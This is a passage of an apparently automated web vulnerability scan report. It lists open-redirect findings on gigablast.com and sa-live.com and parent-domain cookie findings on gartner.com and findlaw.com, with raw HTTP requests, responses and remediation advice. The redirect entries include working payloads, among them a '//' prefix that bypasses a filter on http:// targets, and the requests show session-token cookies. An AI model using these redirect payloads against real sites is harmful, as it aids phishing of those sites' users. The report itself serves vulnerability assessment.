jAwOGRkAgIPFQMJQXVndXN0IDE4BDI2ODY4U2VhbiBTZUxlZ3VlLCBTcGVha2VyLCBQcmVwYXJpbmcgQSBHcmVhdCBBcHBlbGxhdGUgQnJpZWZkAjgPZBYCAgIPFQMJQXVndXN0IDE3BDU3NzcPQXVndXN0IDE3LCAyMDA5ZAI5D2QWBAIBDxYCHwFnFgJmD2QWAgIBDw8WAh8EBQlKdW5lIDIwMDhkZAICDxUDB0p1bmUgMjUEMjY3OFdTZWFuIFNlTGVndWUsIFNwZWFrZXIsIEtleXMgdG8gU3VjY2Vzc2Z1bCBBcHBlYWxzOiBEbydzIEFuZCBEb24ndHMgRnJvbSBBIFByb3ZlbiBXaW5uZXJkAjoPZBYCAgIPFQMHSnVuZSAwNQQyNjgyT1BhbWVsYSBQaGlsbGlwcywgU3BlYWtlciwgVGhlIFN0cmFpZ2h0IFNjb29wIG9uIENvbmZsaWN0cyBmb3IgQ29ycG9yYXRlIExhd3llcnNkAjsPZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFCE1heSAyMDA4ZGQCAg8VAwZNYXkgMjkEMjY3NEVEb3VnbGFzIFdpbnRocm9wLCBTcGVha2VyLCBDb3Jwb3JhdGUgQ291bnNlbCBGb3J1bSBvbiBBZHZlcnRpc2luZyBMYXdkAjwPZBYCAgIPFQMGTWF5IDIyBDI2NjhAQmVybmFyZCBCdXJrLCBTcGVha2VyLCBMTENzOiBBZHZhbmNlZCBQbGFubmluZyBhbmQgTGF0ZXN0IFRyZW5kc2QCPQ9kFgICAg8VAwZNYXkgMjIEMjY3NjxCZW4gQmVyaywgU3BlYWtlciwgTExDczogQWR2YW5jZWQgUGxhbm5pbmcgYW5kIExhdGVzdCBUcmVuZHNkAj4PZBYCAgIPFQMGTWF5IDIxBDI2NzkzU2VhbiBTZUxlZ3VlLCBTcGVha2VyLCBNYXJpbiBDb3VudHkgQmFyIEFzc29jaWF0aW9uZAI/D2QWAgICDxUDBk1heSAxNgQyNjc3eFBhbWVsYSBQaGlsbGlwcywgU3BlYWtlciwgMTZ0aCBBbm51YWwgQ2FsaWZvcm5pYSBXYXRlciBMYXcgQ29uZmVyZW5jZTogVGhlIExhdGVzdCBSZWd1bGF0b3J5IGFuZCBMaXRpZ2F0aW9uIERldmVsb3BtZW50c2QCQA9kFgICAg8VAwZNYXkgMDIEMjY4MGNQYW1lbGEgUGhpbGxpcHMsIFBhbmVsaXN0LCBDYXNlIFN0dWRpZXMgQWRkcmVzc2luZyBFdGhpY3MgYW5kIE1hbHByYWN0aWNlIGluIENvcnBvcmF0ZSBUcmFuc2FjdGlvbnNkAkEPZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFCkFwcmlsIDIwMDhkZAICDxUDCEFwcmlsIDExBDI2ODFKUGFtZWxhIFBoaWxsaXBzLCBTcGVha2VyLCAyM3JkIEFubnVhbCBJbnRlbGxlY3R1YWwgUHJvcGVydHkgTGF3IENvbmZlcmVuY2VkAkIPZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFCk1hcmNoIDIwMDhkZAICDxUDCE1hcmNoIDI2BDI2NzVKRGF2aWQgUmVpcywgU3BlYWtlciwgMjAwOCBEaXNhYmlsaXR5IERpc2NyaW1pbmF0aW9uIEJyb3duIEJhZyBMdW5jaCBTZXJpZXNkAkMPZBYEAgEPFgIfAWcWAmYPZBYCAgEPDxYCHwQFDUZlYnJ1YXJ5IDIwMDhkZAICDxUDC0ZlYnJ1YXJ5IDI5BDI2NzA7VGhvbWFzIE1hZ25hbmksIFNwZWFrZXIsIEFkdmFuY2VkIExpY2Vuc2luZyBBZ3JlZW1lbnRzIDIwMDhkAkQPZBYCAgIPFQMLRmVicnVhcnkgMDcEMjY3MTJEZW5pcyBSaWNlLCBTcGVha2VyLCBJVGVjaExhdyA0dGggQXNpYW4gQ29uZmVyZW5jZWQCBw8PFgIfBAUURXZlbnRzIEFyY2hpdmUgLSBBbGwWAh8IBYQBJCgnLmV2ZW50c2FyY2hpdmV0YWJsZScpLnNsaWRlRG93bignc2xvdycsIGZ1bmN0aW9uKCkgeyAkKCcjY3RsMDBfTWFpbkNvbnRlbnRfcnBFdmVudFRhYlNlY3Rpb25zX2N0bDAxX2xua0V2ZW50c0FyY2hpdmUnKS5oaWRlKCkgfSk7ZAICD2QWDAIBDw8WAh8CBQdTaXRlbWFwZGQCAw8PFgIfAgUENjg2MmRkAgUPDxYCHwIFBkFsdW1uaWRkAgcPDxYCHwIFDUxlZ2FsLU5vdGljZXNkZAIJDw8WAh8CBQQ2ODY2ZGQCCw8PFgIfAgUKQ29udGFjdC1Vc2RkAgMPZBYCAgEPDxYCHwQFVCYjMTY5OyAyMDExIEhvd2FyZCBSaWNlIE5lbWVyb3Zza2kgQ2FuYWR5IEZhbGsgJmFtcDsgUmFia2luIFBDLiBBbGwgcmlnaHRzIHJlc2VydmVkLmRkZA==" />
...[SNIP]...
16. Open redirection  previous  next
There are 3 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Remediation background

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

16.1. http://gigablast.com/ [redir parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://gigablast.com
Path:   /

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload //adfaf5d3a5df2e863/a%3fhttp%3a//biz.yahoo.com/prnews/041007/lath025_1.html was submitted in the redir parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by blocking absolute redirection targets starting with http:// or https://. However, an attacker can defeat this defence by omitting the protocol prefix from their absolute URL. If a redirection target starting with // is specified, then the browser will use the same protocol as the page which issued the redirection.

Remediation detail

When attempting to block absolute redirection targets, the application should verify that the target begins with a single slash followed by a letter, and should reject any input containing a sequence of two slash characters.

Request

GET /?redir=//adfaf5d3a5df2e863/a%3fhttp%3a//biz.yahoo.com/prnews/041007/lath025_1.html HTTP/1.1
Host: gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 RD
Location: //adfaf5d3a5df2e863/a%3fhttp%3a//biz.yahoo.com/prnews/041007/lath025_1.html

ew.html

16.2. https://sa-live.com/l [url parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://sa-live.com
Path:   /l

Issue detail

The value of the url request parameter is used to perform an HTTP redirect. The payload http%3a//ac65215c4d7e0f98e/a%3f-%207878782f776a737674757075626d2f64706e/file-scan/report.html%3fid%3d8b635997bf634f9347f498b2b4e380c3301587db0287c63256b18ae0c850229f-1296497255 was submitted in the url parameter. This caused a redirection to the following URL:

Request

GET /l?v=0&ui=0&p=000c00000000000000000000400000000000&spid=mcafee-forums&url=http%3a//ac65215c4d7e0f98e/a%3f-%207878782f776a737674757075626d2f64706e/file-scan/report.html%3fid%3d8b635997bf634f9347f498b2b4e380c3301587db0287c63256b18ae0c850229f-1296497255 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Accept-Language: en-US
Host: sa-live.com
Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Location: http://ac65215c4d7e0f98e/a?- 7878782f776a737674757075626d2f64706e/file-scan/report.html?id=8b635997bf634f9347f498b2b4e380c3301587db0287c63256b18ae0c850229f-1296497255

16.3. http://www.gigablast.com/ [redir parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /

Issue detail

The value of the redir request parameter is used to perform an HTTP redirect. The payload //a1a2a41e30110a42c/a%3fhttp%3a//www.thesitewizard.com/archive/robotstxt.shtml was submitted in the redir parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by blocking absolute redirection targets starting with http:// or https://. However, an attacker can defeat this defence by omitting the protocol prefix from their absolute URL. If a redirection target starting with // is specified, then the browser will use the same protocol as the page which issued the redirection.

Remediation detail

When attempting to block absolute redirection targets, the application should verify that the target begins with a single slash followed by a letter, and should reject any input containing a sequence of two slash characters.

Request

GET /?redir=//a1a2a41e30110a42c/a%3fhttp%3a//www.thesitewizard.com/archive/robotstxt.shtml HTTP/1.1
Host: www.gigablast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 RD
Location: //a1a2a41e30110a42c/a%3fhttp%3a//www.thesitewizard.com/archive/robotstxt.shtml

17. Cookie scoped to parent domain  previous  next
There are 36 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

17.1. http://www.gartner.com/include/webtrends.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /include/webtrends.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 20:18:56 GMT
Set-Cookie: WebLogicSession=NGzFNMQQLfg4nHNB1rSVw7h8jMcC2MtCGxQhN8JLf9czQh2m7HTy!-483811359; domain=.gartner.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO8859_1
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/
Content-Length: 22376

<!-- START OF Advanced SmartSource Data Collector TAG -->
<!-- Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.-->
<!-- $DateTime: 2006/03/09 14:15:22 $ -->
<!-- 2006/10/30: Modified by
...[SNIP]...
17.2. http://www.gartner.com/js/optionsArray.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /js/optionsArray.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/optionsArray.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/technology/home.jsp
Cookie: MKTSESSIONID=7R35NMQNKWLjx0D2zJ5tccGYZyfhxZz1KqlGnMGQ1Nrj7tKGNHLd!552912517; TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:18:54 GMT
Content-Length: 1591
Set-Cookie: WebLogicSession=3zTYNMQT9rvRhKCt94pNcKjQ3D82n24Bdy1tfTr1R6Lv8LHfq2fs!810112067; domain=.gartner.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: application/x-javascript
Cache-Control: no-cache
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.UE70118C8].[OT/all.OG/includes]
Vary: Accept-Encoding
Set-Cookie: TS83f541=8c2f07080d93fc7c29de368621e79dbfb051461b2195a5984dcc40ad; Path=/


function OptionsArray() {
this.writeOptionsArray = writeOptionsArray;
}

function writeOptionsArray() {
document.write('<option selected="selected" value="">Select a Gartner site</
...[SNIP]...
17.3. http://www.gartner.com/technology/home.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/home.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology/home.jsp HTTP/1.1
Host: www.gartner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: MKTSESSIONID=JMPMNMQNPkND6BwLywKybhwQqYyByL1L5TyQn9qF7xHvWv1rrsqP!552912517; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=ISO-8859-1
Date: Thu, 12 May 2011 20:18:53 GMT
ETag: "pv1671ad4401b30608834f24b293b4eb47"
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10202.C10821.A158661.RA0.G26D17.UE85C916B].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=55f2c2b9d0e93671d1c4f9ed44734e1e7bf81c0d544d5f714dcc40ad; Path=/
Content-Length: 40063

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">


<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Technology Resea
...[SNIP]...
17.4. http://www.gartner.com/technology/include/metricsHelper.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.gartner.com
Path:   /technology/include/metricsHelper.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /technology/include/metricsHelper.jsp HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Thu, 12 May 2011 20:25:20 GMT
Content-Length: 283
Set-Cookie: MKTSESSIONID=SQgcNMCQLhFMPSDQQZqLsv11J7m7mThn0vLS2Jj2rDTpkvHlbmPf!552912517; domain=.gartner.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="set-cookie"
X-PvInfo: [S10203.C10821.A158620.RA0.G26D16.U8B62F8FE].[OT/html.OG/pages]
Vary: Accept-Encoding
Set-Cookie: TS83f541=b5965dfa7335f8b0b5b9705f9f5cfd6b7d6266fe3ef18cd74dcc4230; Path=/


var metricsUserClass = "Visitor";
var metricsLoginTxt = "";
var metricsEmailTxt = "";
var metricsCity = "";
var metricsState
...[SNIP]...
17.5. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941?AQB=1&ndh=1&t=12%2F4%2F2011%2011%3A8%3A58%204%20300&ce=UTF-8&ns=findlaw&pageName=www.powelltrachtman.com%3Ahome%20page&g=http%3A%2F%2Fwww.powelltrachtman.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPowell%2BTrachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.powelltrachtman.com&server=Firmsite&events=event41%3A1305216538594-15367%2Cevent1%2Cevent27&c1=www.powelltrachtman.com&v1=D%3Dc1&h1=www.powelltrachtman.com&c2=www.powelltrachtman.com&v2=D%3Dc2&c3=www.powelltrachtman.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.powelltrachtman.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Epowell%2Btrachtman&c11=n%2Fa%20%7C%20www.powelltrachtman.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20powell%2Btrachtman%20%7C%20www.powelltrachtman.com%3Ahome%20page&v12=D%3Dc12&c18=15367&v18=15367&c19=15367-2011m5&v19=D%3Dc19&c20=1066035&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dpowell%2Btrachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=powell%2Btrachtman&c50=findlaw-12282&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: attorney.findlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.powelltrachtman.com/

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:09:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E6031A851D18C3-40000135A009D2C8[CE]; Expires=Tue, 10 May 2016 16:09:25 GMT; Domain=.findlaw.com; Path=/
Location: http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941?AQB=1&pccr=true&vidn=26E6031A851D18C3-40000135A009D2C8&&ndh=1&t=12%2F4%2F2011%2011%3A8%3A58%204%20300&ce=UTF-8&ns=findlaw&pageName=www.powelltrachtman.com%3Ahome%20page&g=http%3A%2F%2Fwww.powelltrachtman.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPowell%2BTrachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.powelltrachtman.com&server=Firmsite&events=event41%3A1305216538594-15367%2Cevent1%2Cevent27&c1=www.powelltrachtman.com&v1=D%3Dc1&h1=www.powelltrachtman.com&c2=www.powelltrachtman.com&v2=D%3Dc2&c3=www.powelltrachtman.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.powelltrachtman.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Epowell%2Btrachtman&c11=n%2Fa%20%7C%20www.powelltrachtman.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20powell%2Btrachtman%20%7C%20www.powelltrachtman.com%3Ahome%20page&v12=D%3Dc12&c18=15367&v18=15367&c19=15367-2011m5&v19=D%3Dc19&c20=1066035&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Dpowell%2Btrachtman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=powell%2Btrachtman&c50=findlaw-12282&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 16:09:25 GMT
Last-Modified: Fri, 13 May 2011 16:09:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www373
Content-Length: 0
Content-Type: text/plain

17.6. http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://attorney.findlaw.com
Path:   /b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657?AQB=1&ndh=1&t=12%2F4%2F2011%2011%3A9%3A26%204%20300&ce=UTF-8&ns=findlaw&pageName=www.jdtplaw.com%3Ahome%20page&g=http%3A%2F%2Fwww.jdtplaw.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DJackson%2BDeMarco%2BTidus%2BPeckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.jdtplaw.com&server=Firmsite&events=event41%3A1305216566069-15818%2Cevent1%2Cevent27&c1=www.jdtplaw.com&v1=D%3Dc1&h1=www.jdtplaw.com&c2=www.jdtplaw.com&v2=D%3Dc2&c3=www.jdtplaw.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.jdtplaw.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Ejackson%2Bdemarco%2Btidus%2Bpeckenpaugh&c11=n%2Fa%20%7C%20www.jdtplaw.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20jackson%2Bdemarco%2Btidus%2Bpeckenpaugh%20%7C%20www.jdtplaw.com%3Ahome%20page&v12=D%3Dc12&c18=15818&v18=15818&c19=15818-2011m5&v19=D%3Dc19&c20=1086740&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Djackson%2Bdemarco%2Btidus%2Bpeckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=jackson%2Bdemarco%2Btidus%2Bpeckenpaugh&c50=findlaw-12513&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1 HTTP/1.1
Host: attorney.findlaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.jdtplaw.com/

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 16:10:34 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E6033D051D0A24-40000105800472A2[CE]; Expires=Tue, 10 May 2016 16:10:34 GMT; Domain=.findlaw.com; Path=/
Location: http://attorney.findlaw.com/b/ss/findlaw-12513,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s38032674036657?AQB=1&pccr=true&vidn=26E6033D051D0A24-40000105800472A2&&ndh=1&t=12%2F4%2F2011%2011%3A9%3A26%204%20300&ce=UTF-8&ns=findlaw&pageName=www.jdtplaw.com%3Ahome%20page&g=http%3A%2F%2Fwww.jdtplaw.com%2F&r=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DJackson%2BDeMarco%2BTidus%2BPeckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a&cc=USD&ch=www.jdtplaw.com&server=Firmsite&events=event41%3A1305216566069-15818%2Cevent1%2Cevent27&c1=www.jdtplaw.com&v1=D%3Dc1&h1=www.jdtplaw.com&c2=www.jdtplaw.com&v2=D%3Dc2&c3=www.jdtplaw.com&v3=D%3Dc3&h3=Natural%20Search&c4=D%3Dh1&v4=D%3Dh1&h4=Firmsite%3Ahome%20page&v5=www.jdtplaw.com%3Ahome%20page&h5=www.google.com%3ENatural%20Search%3Ejackson%2Bdemarco%2Btidus%2Bpeckenpaugh&c11=n%2Fa%20%7C%20www.jdtplaw.com%3Ahome%20page&v11=D%3Dc11&c12=Natural%20Search%20%7C%20jackson%2Bdemarco%2Btidus%2Bpeckenpaugh%20%7C%20www.jdtplaw.com%3Ahome%20page&v12=D%3Dc12&c18=15818&v18=15818&c19=15818-2011m5&v19=D%3Dc19&c20=1086740&v20=D%3Dc20&c21=New&v21=New&c22=D%3DpageName&c25=1&v25=1&c26=First%20Visit&v26=D%3Dc26&c27=D%3Dg&v27=http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3Djackson%2Bdemarco%2Btidus%2Bpeckenpaugh%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-us%3Aofficial%26client%3Dfirefox-a&c28=D%3Dh4&v28=D%3Dh4&c29=11%3A00AM&v29=11%3A00AM&c30=Thursday&v30=Thursday&c47=D%3Dv47&v47=Natural%20Search&v48=www.google.com&v49=jackson%2Bdemarco%2Btidus%2Bpeckenpaugh&c50=findlaw-12513&v50=www.google.com&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1002&bh=938&p=Java%20Deployment%20Toolkit%206.0.240.7%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 16:10:34 GMT
Last-Modified: Fri, 13 May 2011 16:10:34 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www44
Content-Length: 0
Content-Type: text/plain

